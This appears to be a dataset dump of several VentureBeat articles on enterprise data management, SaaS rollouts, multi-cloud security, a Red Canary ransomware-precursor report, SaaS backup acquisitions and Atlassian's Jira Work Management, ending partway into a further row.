"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Report: Flawed data management leads to lost revenue for most companies Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. According to a new report by Fivetran and Wakefield Research, 85% of data leaders surveyed say flawed data management leads to poor decision-making and lost revenue. Overall, the results provide a detailed look at where these data management processes are failing and why data and analytics leaders are struggling to keep up. Nearly 3 in 4 data and analytics leaders (72%) say their team’s time is being wasted on manual oversight of data pipelines — a poor use of time and talent. Sixty-nine percent of data and analytics leaders say their business outcomes at their company would be somewhat or significantly improved if their data team were able to contribute more to business decisions rather than manual pipeline management. The manual approach is full of inefficiencies and not at all optimized. Eighty percent of those surveyed admit they have to rebuild data pipelines after deployment, such as changing APIs. In addition to being error-prone, the process for deriving valuable insight from the data with manual pipelines is extremely slow. Only 13% report being able to derive value from newly collected data in minutes or hours. For 76% of companies, including 74% of companies with $500 million-plus in revenue, however, it takes days or up to a week to prepare the data for revenue-impacting decisions. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! The Fivetran survey was conducted by Wakefield Research among 300 data and analytics leaders, VP and above; in the U.S., U.K., Germany, and France; at companies with $100 million+ in annual revenue, a minimum of 100 employees, and who are familiar with the data strategy/data use at their organization; between September 27 and October 12, 2021, using an email invitation and an online survey. Read the full report by Fivetran and Wakefield Research. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,111
2,022
"How a skilled advocate can improve SaaS technology transformation | VentureBeat"
"https://venturebeat.com/2022/02/22/how-a-skilled-advocate-can-improve-saas-technology-transformation"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community How a skilled advocate can improve SaaS technology transformation Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. This article was contributed by Thomas Donnelly, chief information officer of BetterCloud. Technology progress is hobbled in the enterprise. It’s time to un-hobble it. Technology transformation is fundamental to every business that aims to run well and compete successfully. Our organization focuses on helping companies manage technology change and use it to transform — for the better — how departments do business. This gives us a continuous view of what works well in deploying new software-as-a-service (SaaS) apps. We also experiment internally to improve our own business agility and expansion, and we’re here to explain what we found works best for tech transformation. While it’s ideal to plan and coordinate new technology imperatives strategically, many IT groups are trapped in reactive mode. As a result, they are off-balance, unprepared, and key considerations get overlooked. We’re going to recommend that you try a new method to leapfrog over the struggles of reactive mode. First, though, let’s look at what tends to go wrong with technology (SaaS, in particular) deployments. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Application deployment projects are often frustrated by waits for some other department to finish a particular task. While you wait, forward movement is blocked. An implementation team can help by organizing and aligning the participants, who are typically busy and don’t see SaaS deployments as their top priority. Operating departments and their project participants typically have a very “local” perspective, so they are not aware of applications, data, or deployments in other departments. That leads to duplications and avoidable mismatches or incompatibilities. Most companies are functional hierarchies. That can mean resistance to implementing applications across functions. Marketing is here; finance is separate over there. Sales is on another island. Departmental boundaries make it difficult to sync enterprise data with silos , so data integration takes inordinate effort. Implementers may take the easy route and create a silo for one workgroup. That immediately gives birth to problems that are tough to fix later. Nearly every company wants to implement more effectively across the enterprise and also avoid data and process siloes. There are often tradeoffs between meeting today’s needs in one department and fulfilling enterprise objectives. The department may prefer a specific app and vendor based on past familiarity, but the company seeks to avoid adding new SaaS vendors when a suitable application is already deployed in another department. The embedded technology advocate and business analyst for Saas initiatives In our experience, people are the key to technology transformation. Our SaaS initiatives enjoyed better outcomes when we embedded business analysts in departments, where they act as business partners, aligning technology with departmental objectives and corporate strategy. Their job starts with understanding a department’s needs. These analysts, whom we dubbed “embedded technology advocates” or advocates, are good at building trust and managing projects. An embedded advocate helps with SaaS projects in requirements definition, technology choices, implementation, and user onboarding/privilege assignment. They attend department meetings, understand the challenges, help propose future initiatives and build constructive relationships that bridge between departments, IT and senior management. They work daily to align a department’s apps, data and processes with the rest of the enterprise. How we went about it We established a group of Advocates (feel free to label them tech guides or simply business analysts) who embed with each functional department. Each advocate typically represents two or three departments at once to the enterprise and IT. They stay busy; an embedded Advocate at a large company may take part in 10 to 30 deployments per year, or more. Some deployments will be multiple rollouts of the same app, but in different departments. We quickly saw that with advocates, the technology choices and deployments worked better. It was easy to see why. On their own, functional departments like marketing, sales, and purchasing are challenged to plan and complete new SaaS projects, especially when it comes to taking a cross-functional, enterprise view. Advocates quickly became experts in the subject of SaaS selection and implementation. To find embedded Advocates, you can both hire internally and recruit outside. Look for project management skills and operational experience. Sales operations and Finance experience have worked out well in this “analytic extrovert” role. Putting embedded tech and SaaS advocates into action Once assigned, the technology advocates meet regularly with their constituent departments and IT, security, and deployment teams. They learn the department’s processes and which data is important. The Advocates become their department’s primary contact for technology changes. The Advocate pulls the necessary contributors into a project when needed, which cuts the workload significantly. An Advocate actually makes technology decisions on behalf of the department, or at least plays an influential role in them. In this kind of structure, the advocate becomes trusted by the departments as well as by IT and security, and can be a trusted guide. The results are encouraging The results are promising. SaaS implementations and onboarding go faster, without disrupting operational teams. Creation of silos stops. The advocate completes work that department stakeholders don’t have the time, focus, cross-functional knowledge or motivation to do. We saw the embedded advocate approach reduced the time expended on SaaS implementations and deterred information silos. It helps make departmental data widely accessible and more valuable to the company. Local ‘invisible’ silos can hold information valuable to other departments; they shouldn’t be in the dark about what’s there and how it’s used. Advocates are committed to leveraging data; they work to synchronize and integrate silo data with enterprise resources. Whether an advocate embeds with two or three departments at once depends on experience, on their creativity, and their problem-solving ability. Advocates smooth the path and accelerate technology transformation. That brings IT to the forefront with more deployment successes, better data utilization, and positive reviews. The Embedded Technology Advocate approach has been highly effective here. We now recommend it to our customers who may deploy 20, 30, or even more applications yearly. We are excited to see the results it brings for them. Thomas Donnelly is chief information officer of BetterCloud. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,112
2,022
"The difficulty of scaling a Frankencloud | VentureBeat"
"https://venturebeat.com/2022/03/14/the-difficulty-of-scaling-a-frankencloud"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community The difficulty of scaling a Frankencloud Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. This article was contributed by Kelley Kirby, product marketing analyst at Uptycs Let’s talk about the cloud (because who isn’t?). Over the last several years, we’ve seen cloud adoption skyrocket as organizations work to find the most efficient and cost-effective way of operating their business. Whether the cloud environment be public, private, hybrid or multi-cloud, this worldwide growth has led to a steady increase in available cloud services, their providers, and configurations. Back in 2019, 81% of public cloud users reported using two or more providers (pre-pandemic, so you can imagine how much that number has grown), and while the benefits of cloud use far outweigh the risk, it can come with some glaring challenges as you try to grow your business. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! As a small organization, running a handful of services and applications, and deploying workloads all with a single cloud provider makes cloud management seem simple. But the story is very different for a growing enterprise with assets and workloads across multiple cloud providers, complex data lakes, services hosted in various geolocations, and an array of tools that don’t offer support for every piece of your cloud estate. This complicated cloud amalgamation (Frankencloud, if you will) is often a result of initial cost efficiency or acquisition, but whatever the case, scaling that convoluted architecture as your business evolves is hard. Cloud scaling challenges When your business started, the idea of cloud adoption was an easy one to wrap your head around. It’d simplify a number of your business processes, increase data accessibility, improve efficiency, and reduce overall operational costs. In theory, cloud computing would make scaling your organization as it grew much easier. And it did! But, alas, the ease has passed since your business took off. You now have a multitude of cloud instances running services and workloads across three major providers in an attempt to cut costs and avoid vendor lock-in, acquired a small firm using a private cloud hosted in the EU with new regulations to adhere to, and have more tools to help manage it all than you can count on two hands. Simply put, it’s gotten overwhelming and now you’re trying to figure out how to scale up. The fact of the matter is, the more complex your environment gets, the more difficult scaling is going to be. Let’s take a look at some of these challenges and what they could mean for your business. Configuring your Frankencloud across providers Configuration for your applications, infrastructure and workloads are not going to be the same across cloud providers. Each provider has its own way of provisioning, deploying, and managing instances, and it’s your responsibility to ensure the correct configuration of your resources. It can be tempting to rush through the configuration process (because going through the motions multiple times takes ages and you have a million other things to do), but it’s endlessly important to make sure you’ve configured your resources correctly and are rechecking them frequently as things change to avoid compliance and security risks. A misconfiguration could mean non-compliance associated with regulatory fines or, heaven forbid, a security breach, and scaling too quickly without keeping your configurations in check could cost you. Like, a lot. According to IBM’s Cost of a Data Breach Report 2021 , the more complex your environment is and the more you’re failing compliance checks, the more likely you are to pay up to $2.3M more in the event of a breach. This brings me to the next challenge of… Securing your Frankencloud With the Shared Responsibility Model largely leaving the onus on the customer to secure their own cloud environment, there’s not a whole lot that comes built in to work with. This means that hardening your environment, implementing security controls, refining privileges and identities, and identifying and remediating vulnerabilities are now consistently at the top of your cloud scaling to-do list. And since the responsibilities vary for each provider, you must figure out what’s required for each provider. There are guidelines to help you achieve some of this on your own, like the AWS Well-Architected Framework Security Pillar or CIS Benchmarks , and a plethora of cloud security vendors ready to help you pick up the slack, but the trouble is rolling out these security measures for your entire cloud estate in a way that ensures complete coverage from end-to-end. This is especially challenging because very few cloud security vendors offer support for multiple cloud providers, and the ones that do often have a very limited toolset designed for a particular use case. This has resulted in security teams compiling several tools between multiple security vendors in an attempt to cover all the bases (FrankenSec?), but these disconnected and siloed systems typically do not integrate and can only deliver pieces of their whole cloud security picture, leaving blind spots. The blind spots between solutions can allow threat detection signals to go unnoticed because related security events could be happening in two different systems, but the disconnected security solutions aren’t able to correlate them as suspicious. In this case, the only way to discover the events are related is to manually triage every detection across each system and discover their connection yourself. But between the volume of detections you may receive (a number of them being false positives) and the increasing problem with alert fatigue, the margin for error is quite high and you may still miss it anyway. Observing your Frankencloud Similarly, with securing your Frankencloud, getting full visibility of your entire cloud estate is a major challenge. You’re faced with the same difficulty of disparate solutions that leave you with an incomplete picture of your cloud environments and resources. Without complete visibility into where your cloud data is, which applications interact with which services, and who has access to what, you could be oblivious to misconfigurations, threats, overspending and non-compliant policies. Understanding how different resources, identities and services interact with one another helps you to prioritize configuration fixes, control privilege escalation, and perform audits, ultimately improving resource performance and reducing security risk. The larger your cloud estate gets with gaps in visibility, the harder it’s going to be to do those things effectively. Summary: Scaling your cloud creation Your Frankenstein cloud creation has made scaling a bit of a nightmare (pun intended), but you’re not alone. While no two cloud environments look the same, these challenges are faced by any organization operating in a complex cloud environment. You can find some comfort in knowing that it’s probably not a result of anything you’re doing inherently wrong. To scale a complex cloud environment effectively without creating new headaches for yourself down the road, you’ll need to be able to: Monitor everything that’s going on across cloud providers, including asset relationships and privilege allocation. Ensure end-to-end security with no blind spots from disconnected tool sets. Discover misconfigurations as you evolve to avoid compliance failures and vulnerabilities. Having a single, unified solution that can help you address these challenges all in one place will largely reduce the amount of time, overhead and stress that accompany a complicated cloud scaling project. Kelley Kirby is a product marketing analyst at Uptycs DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,113
2,022
"Report: 60% of security threats are precursors to ransomware | VentureBeat"
"https://venturebeat.com/2022/03/22/report-60-of-security-threats-are-precursors-to-ransomware"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Report: 60% of security threats are precursors to ransomware Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. New research from Red Canary has indicated that by developing robust detection coverage for the techniques adversaries abuse most often, security teams can achieve defense-in-depth against the many threats that leverage those techniques and the broader trends that dominate the infosec landscape. The report is organized into three cascading sections: trends, the threats that comprise those trends and the MITRE ATT&CK® techniques that are leveraged by those threats. Each section includes extensive guidance that security teams can use to mitigate, prevent or detect the malicious activity described in the report. The biggest trend in 2021, not surprisingly, was ransomware. Counterintuitively, Red Canary doesn’t detect much ransomware, and the reason for that is probably the single most important takeaway from the report. Ransomware is almost always the eventual payload delivered by earlier-stage malicious software or activity; if you detect the threats that deliver the ransomware, you stop the ransomware before it arrives. So, how do you detect those threats? Focus on the techniques that adversaries are most likely to leverage. Of the top 10 threats Red Canary observed in 2021, 60% are ransomware precursors (i.e., threats that’ve been known to deliver ransomware as a follow-on payload). More staggering is that a full 100% of the top ATT&CK techniques have been used during an attempted ransomware infection. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! As an example, a significant plurality of ransomware infections involve the use of a command and control (C2) product called Cobalt Strike — Red Canary’s second-ranked threat. Cobalt Strike, in turn, leverages ATT&CK techniques like PowerShell, Rundll32, Process Injection, Obfuscated Files or Information and DLL Search Order Hijacking, all of which are in the top 10. If you develop broad detection coverage for those techniques, then you’ve got a great shot of detecting Cobalt Strike and preventing ransomware infections. The report is based on analysis of the more than 30,000 confirmed threats detected across Red Canary’s customer base in 2021. Read the full report by Red Canary. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,114
2,021
"Rewind acquires BackHub to extend its automated SaaS data backups to GitHub | VentureBeat"
"https://venturebeat.com/2021/02/11/rewind-acquires-backhub-to-extend-its-automated-saas-data-backups-to-github"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Rewind acquires BackHub to extend its automated SaaS data backups to GitHub Share on Facebook Share on X Share on LinkedIn A GitHub logo seen displayed on a smartphone. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Cloud infrastructure spending has gone through the roof during the pandemic, due in large part to the rapid embrace of remote work. This has benefited SaaS businesses that operate in the cloud, like Shopify, which has quadrupled in valuation over the past year. But as more businesses flock to the cloud, the need to protect all their valuable data becomes more pronounced. Against this backdrop, Canadian back-up-as-a-service (BaaS) company Rewind today announced that it’s expanding its coverage to include GitHub, the largest source code host on Earth, by acquiring Germany-based BackHub. Terms of the deal were not disclosed. Rewind raised its first notable outside funding less than a month ago, securing $15 million in a series A round led by Inovia Capital. Get backup Founded in Ottawa, Canada in 2015, Rewind currently offers data backup and copy services for businesses running Shopify, BigCommerce, and Intuit Quickbooks. While such SaaS platforms have their own systemwide data backup tools in case of catastrophes that would impact all users, they don’t typically offer this to customers at an account level. This division is what’s known as a “shared responsibility model,” where the platform owner assumes some of the responsibility for the infrastructure security and disaster recovery while users take on other aspects, such as managing permissions and password security and ensuring they create backups of all the data that goes into their account. This is essentially what Rewind handles. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! BackHub, which was founded in Berlin in 2014, is a relatively lean bootstrapped outfit with just three employees, including founder and CEO Daniel Heitz, who will now join Rewind as a senior product manager. Rewind will continue to offer BackHub through the startup’s own website and the GitHub marketplace , with the same pricing structure , which starts at $12 per month for up to 10 repository backups. Above: BackHub Despite its fairly low-profile status, BackHub claims some 1,000 customers, though it was only at liberty to reveal one: MailOnline, the global news website belonging to U.K. newspaper The Daily Mail. Compliance and risk It can be easy to assume all your SaaS data is safe because of a platform’s robust infrastructure and security, but there are many scenarios that make backing up data essential, including compliance obligations and various external and internal risks. “Aside from the common sense wisdom of backing up your data in at least two separate systems, many larger customers have to comply with a range of compliance mandates surrounding sensitive data,” Rewind CEO Mike Potter told VentureBeat. “SaaS data is vulnerable to multiple risk vectors: ransomware, human error, disgruntled employees deleting data, misbehaving third-party applications, and so on.” While there are other options for businesses looking to create backups for all their GitHub data, these often entail a significant manual investment and offer limited utility. “Those tools do a good job of extracting the data, but they’re not particularly useful for restoring a code repository in GitHub, which is where the value [in BackHub] really lies,” Potter added. BackHub promises to create a GitHub backup in minutes, including all the metadata associated with each repository, and auto-syncs it to ensure it’s kept up to date. A separate BackHub app helps companies restore all their data immediately, should the need arise, while BackHub can also generate audit logs for enterprise compliance requirements. BackHub works with both private and public repositories, meaning it’s designed for proprietary and open source software (OSS) data backups. Open source intersects with just about every piece of software these days, from scripts that help servers run faster to code that contributes to systems architecture and APIs. Moreover, the pandemic has accelerated open source adoption in the enterprise , and GitHub data suggests 72% of Fortune 50 companies use GitHub Enterprise for their private projects. BackHub was also running an early-stage program to support GitLab and Bitbucket, which will eventually extend Rewind’s coverage even further. Elsewhere, Rewind is in the early stages of introducing additional backup support for Trello, Jira, Zendesk, and Xero. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,115
2,021
"Rewind extends SaaS data backup and recovery to Trello | VentureBeat"
"https://venturebeat.com/2021/04/27/rewind-extends-saas-data-backup-and-recovery-to-trello"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Rewind extends SaaS data backup and recovery to Trello Share on Facebook Share on X Share on LinkedIn Illustration the Trello logo seen displayed on a smartphone Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Team communication and collaboration software revealed its true worth over the past 12 months, as businesses across the spectrum rapidly transitioned to remote work. From Zoom to Slack and beyond, companies that weren’t already all-in on the digital workforce were given little choice — it was either sink or swim. However, with cloud spending going through the roof in 2020, a trend that’s set to continue in 2021 and beyond , this opens a Pandora’s box of questions for businesses embracing the giant hard-drive in the sky — how safe is all their data? Privacy issues aside, companies that entrust all their mission-critical information to third-party SaaS companies and clouds need a backup plan if disaster strikes. A recent cloud threat report published by Oracle and KPMG found that 75% of organizations in the study had experienced data loss from a cloud service on more than a single occasion. And this is something that Canadian company Rewind is setting out to solve with automated data backup and recovery services for many of the popular SaaS tools of today. Hello Trello Up until now, Rewind offered data backup and recovery for Shopify, BigCommerce, Intuit QuickBooks, and — as of two months ago — GitHub. Today, the company is extending support to Trello , the popular team collaboration and project management platform operated by Atlassian. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Above: Rewind: Trello backups It’s worth noting that most SaaS platforms offer their own disaster recovery tools for when a systemwide catastrophe occurs, so if a fire rips through one of their datacenters they can restore all the accounts to their former state from an alternative (backup) datacenter. But this doesn’t work at an individual account level, and the SaaS company typically doesn’t enable customers to recover individual data specific to them on-demand. This is what is widely known as a “shared responsibility” model, where the platform owner (e.g. Trello or GitHub) is responsible for infrastructure-level security and disaster recovery, and the customer is responsible for managing password security, permissions, and backing up all the data in their account. There are various existing methods open to Trello users looking to create backups for their data, such as setting reminders to capture screenshots of boards, exporting JSON or CSV files, or manually creating copies of project boards. Ignoring the significant time and resource drain this creates for companies, the process of restoring the data in these scenarios doesn’t bear thinking about. “The main issue with these types of manual backups is the inability to easily restore data,” Rewind CEO and cofounder Mike Potter told VentureBeat. “Manually backing up data means manually restoring it, which tends to be a slow and tedious process. Manual backups are also frequently forgotten and left out-of-date.” And that, essentially, is the role that Rewind fulfills. It not only creates and stores automated backups of each customers’ Trello instance, it restores it all to its former glory with the click of a button. The integration is available via Trello’s Power-Up marketplace , and it requires no real technical prowess — the full backup and recovery service is accessible via a browser. Above: Rewind: Trello backups, advanced restore Moreover, Rewind backs up individual items of data and all their dependencies and relationships. This includes each Trello board, as well as all the cards (tasks or ideas), lists (collection of cards), labels, custom fields, checklists, and attachments on that board. At launch, however, users can only back up their boards and all the associated entities as a whole package. In the near future, users will also be able to choose on a more granular level, so they can just back up specific cards, lists, or attachments, for example. Native state This all leads us to one lingering question. Why don’t SaaS companies offer such account-level backup services natively? This would surely be a huge selling point, particularly for enterprise clients. “While backups might seem like basic functionality, the fact is that building and continuously supporting a full-featured, scalable backup and restore solution presents non-trivial technical and usability challenges that tend to lie outside the core capabilities of commonly used SaaS platforms,” Potter hypothesized. Moreover, it’s good practice to house backups away from the host platform. This isn’t purely for reasons related to natural disasters — how do you access your Trello backup if, for example, you’re locked out of your Trello account? “A true backup gives you full access to your data at all times,” Potter said. “Best practices for data security and business continuity call for the 3-2-1 backup method — three total copies of your data, two of which are local but on different mediums or devices, and at least one copy off-site.” This latest launch comes just a few months after Rewind raised its first notable outside funding, securing $15 million in a series A round led by Inovia Capital. In the future, Rewind said that it plans to extend support to other popular SaaS tools such as Jira, GitLab, Xero, Bitbucket, and Zendesk. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,116
2,021
"Atlassian's Jira Work Management encourages team collaboration | VentureBeat"
"https://venturebeat.com/2021/04/28/atlassians-jira-work-management-encourages-team-collaboration"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Atlassian’s Jira Work Management encourages team collaboration Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. At its Team21 conference today, Atlassian unveiled Jira Work Management, a new product built specifically for enterprise teams. The next generation of Jira Core, Jira Work Management is described as a platform that enables marketing, HR, finance, and design employees to connect with their technical counterparts and work together more efficiently. As the pace of change increases, new ways of working are forcing teams to become more agile. Gartner reports that 74% of companies plan to shift some of their employees to remote working permanently. But more than half of remote employees say they feel disconnected from in-office employees, according to an Owl Labs survey, highlighting remote work challenges that must be overcome. With Jira Work Management, which was first announced in March, Atlassian aims to enable business customers to take advantage of the capabilities native to its Jira product family. The architecture that Jira Work Management shares with Jira Software and Jira Service Management lets data flow between projects within organizations. This means a request for a website update can pass through designers using Jira Work Management, as well as developers using Jira Software, for example. Above: Atlassian Jira Work Management’s calendar view. “Jira Work Management combines cutting-edge work management capabilities with the power and customizability of Jira to create a new standard for business teams managing projects,” Atlassian product marketing head Chase Wilson said in a blog post. “This is the first Jira built for business teams, by business teams. We crafted this new Jira experience directly with customer design partners of all sizes and industries, as well as internal Atlassian teams of every type — including our own Jira Work Management teams.” VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Enabling cross-team collaboration Tasks from teams and projects in Jira Work Management can be linked together to reveal dependencies and connections. These links support custom names, allowing employees to create dashboards that report on organization-wide progress. Users can choose from over 35 options, including workload, heat map, filters, and charts, or bring in data with direct integrations. Jira Work Management offers a number of features, including lists, a calendar, and a board that displays tasks from one or more projects. The platform’s timeline feature shows tasks with assignees and statuses, while its forms creator, which is available to licensed Jira Cloud users, lets employees create forms with a drag-and-drop interface. Above: The timeline view in Jira Work Management. Beyond this, Jira Work Management offers templates of industry-researched workflows and configurations, each with custom issue types, workflows, and fields. Teams see tasks and issues such as “asset” (in design or marketing use cases) and “candidate” (in recruiting use cases) instead of “stories” and “bugs” (software development). And in place of software-specific functionalities like code, backlog, components, and releases, the left navigation menu in the platform highlights views, forms, and a summary tab for insights. Jira Work Management also offers free automation rules and actions within projects. Teams can select premade rules from a business automation library or create rules for use cases and departments. Atlassian says all of the features are available for Jira Work Management project on every instance, across every pricing edition — including the free plan. The company adds that over the next six months, Jira Work Management will gain improvements to all of its views, optimized reporting functionality, approvals for sign-off, and new collaboration features. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,117
2,021
"Salesforce and Atlassian double down on developer security with $75M Snyk investment | VentureBeat"
